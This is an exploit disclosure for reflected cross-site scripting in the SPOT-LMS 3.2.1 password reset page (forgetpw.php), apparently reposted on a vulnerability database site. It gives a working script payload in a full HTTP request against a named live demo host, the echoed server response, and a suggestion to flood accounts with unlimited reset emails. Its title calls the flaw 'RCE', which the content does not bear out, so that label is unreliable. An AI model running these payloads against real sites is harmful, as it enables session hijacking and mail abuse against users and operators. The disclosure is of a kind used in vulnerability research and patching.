`## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) RCE - reset mail vulnerability
## Author: nu11secur1ty
## Date: 11.07.2022
## Vendor: https://www.spotlms.us/index_multi.php
## The software is applied in the demo account:
https://www.spotlms-anca-001.ovh/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest
## Description:
The name of an arbitrarily supplied `URL` parameter from forgetpw.php
is copied into the value of an HTML tag attribute which is
encapsulated in double quotation marks.
The payload qnlxv"><script>alert('hello from
nu11secur1ty')</script>sad4r was submitted in the name of an
arbitrarily supplied URL parameter.
This input was echoed unmodified in the application's response.
The attacker can use this vulnerability to crash the cloud system by
sending an unlimited password reset request to mail in an already
created account on some domain, for example:
(www.spotlms-anca-001.ovh).
## NOTE:
For this test `google` reacted on the twentieth request =) and they
block the requests from my exploit, but after some time the attacker
can repeat and repeat these steps endlessly :)
## STATUS: HIGH Vulnerability
[+] Exploit:
```POST
GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img
src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>");
}; window.onload = a; alert("A Hidden scripted image, warning you are
vulnerable!");</script>sad4r HTTP/2
Host: www.spotlms-anca-001.ovh
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Cache-Control: max-age=0
Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809;
_ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793;
_gat=1
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
```
[+]Responce:
```
pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');
//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"
src="/images/logos/logo-aurorae-v0.png" width="176" height="65"
data-pagespeed-url-hash="3925108827"
onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>
<center>
<p class="mt-3">A validation code will be sent to
your email to authorize the password reset operation</p>
</center>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)
## Proof and Exploit:
[href](https://streamable.com/y4gz1n)
## Time spent
`1:45`
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation